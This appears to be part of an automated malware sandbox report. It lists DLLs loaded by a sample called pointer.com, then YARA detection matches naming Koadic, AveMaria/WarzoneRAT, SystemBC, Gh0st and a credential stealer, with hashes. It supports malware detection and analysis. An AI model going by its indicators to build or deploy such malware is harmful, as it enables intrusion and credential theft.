Source: C:\Users\Public\pointer.com	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\pointer.com	Section loaded: am.dll	Jump to behavior

Source: PRODUCT.bat, type: SAMPLE	Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: 8.2.pointer.com.12661d48.9.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
